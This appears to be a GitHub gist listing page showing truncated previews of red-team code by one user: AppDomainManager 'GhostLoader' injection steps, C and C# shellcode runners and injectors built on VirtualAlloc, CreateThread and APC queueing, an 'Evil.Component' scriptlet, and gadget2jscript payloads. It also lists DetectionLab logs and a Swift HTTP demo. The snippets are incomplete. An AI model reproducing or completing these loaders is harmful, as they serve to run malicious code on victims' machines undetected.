GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
David kafkaesqu3
kafkaesqu3
/ shellcoderunner.c
Created
August 14, 2019 13:35
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "pch.h" | |
| #include <windows.h> | |
| int main() { | |
| unsigned char shellcode[] = "\x00.."; | |
| //Execute shellcode | |
| void *exec = VirtualAlloc(0, shellcodeSize, MEM_COMMIT, PAGE_READWRITE); | |
| DWORD OldProtect = NULL; |
kafkaesqu3
/ encrypted-shellcoderunner.c
Created
August 14, 2019 13:38
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <string.h> | |
| /* | |
| 1. Decrypt the encrypted shellcode with the key used to encrypt the shellcode. | |
| 2. Allocate a enough space on virtual memory for the decrypted shell code using VirtualAlloc() | |
| 3. Copy decrypted shellcode to the allocated memory using RtlMoveMemory() | |
| 4. Execute the certain region using CreateThread() | |
| */ |
kafkaesqu3
/ Test.sct
Last active
September 2, 2019 22:47
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Evil.Component" | |
| progid="Evil.Component" | |
| version="1" | |
| classid="{69486DD6-C19F-42e8-B508-A53F9F8E67B8}" | |
| remotable="true" | |
| > |
kafkaesqu3
/ vagrant_up_wef.log
Created
December 24, 2019 04:59
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Bringing machine 'wef' up with 'vmware_desktop' provider... | |
| ==> wef: Cloning VMware VM: 'detectionlab/win2016'. This can take some time... | |
| ==> wef: Checking if box 'detectionlab/win2016' version '1.4' is up to date... | |
| ==> wef: Verifying vmnet devices are healthy... | |
| ==> wef: Preparing network adapters... | |
| WARNING: The VMX file for this box contains a setting that is automatically overwritten by Vagrant | |
| WARNING: when started. Vagrant will stop overwriting this setting in an upcoming release which may | |
| WARNING: prevent proper networking setup. Below is the detected VMX setting: | |
| WARNING: | |
| WARNING: ethernet0.pcislotnumber = "33" |
kafkaesqu3
/ vagrant_up_logger.log
Created
December 24, 2019 04:59
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Bringing machine 'logger' up with 'vmware_desktop' provider... | |
| ==> logger: Cloning VMware VM: 'bento/ubuntu-16.04'. This can take some time... | |
| ==> logger: Checking if box 'bento/ubuntu-16.04' version '201808.24.0' is up to date... | |
| ==> logger: A newer version of the box 'bento/ubuntu-16.04' for provider 'vmware_desktop' is | |
| ==> logger: available! You currently have version '201808.24.0'. The latest is version | |
| ==> logger: '201912.04.0'. Run `vagrant box update` to update. | |
| ==> logger: Verifying vmnet devices are healthy... | |
| ==> logger: Preparing network adapters... | |
| ==> logger: Starting the VMware VM... | |
| ==> logger: Waiting for the VM to receive an address... |
kafkaesqu3
/ _Instructions_Reproduce.md
Created
April 30, 2020 01:06
GhostLoader - AppDomainManager - Injection - 攻壳机动队
kafkaesqu3
/ blockdlls_gadget2jscript.cs
Created
May 1, 2020 13:31
— forked from rvrsh3ll/blockdlls_gadget2jscript.cs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.IO.Compression; | |
| using System.Runtime.InteropServices; | |
| public class Payload | |
| { | |
| public Payload() |
kafkaesqu3
/ gadget2jscriptQueueAPCInject.cs
Created
May 29, 2020 18:28
— forked from rvrsh3ll/gadget2jscriptQueueAPCInject.cs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Runtime.InteropServices; | |
| using System.Net; | |
| using System.IO.Compression; | |
| public class Payload | |
| { |
kafkaesqu3
/ CreateThread_ShellcodeInjection.cs
Last active
October 19, 2023 23:54
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Runtime.InteropServices; | |
| namespace Inject | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { | |
| byte[] shellcode; |
kafkaesqu3
/ http_get.swift
Last active
September 30, 2020 20:32
demonstration of HTTP GET requests in swift
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // main.swift | |
| // HTTPGet | |
| // | |
| // Created by david on 9/30/20. | |
| // | |
| import Foundation | |
| func async_req() -> Void { |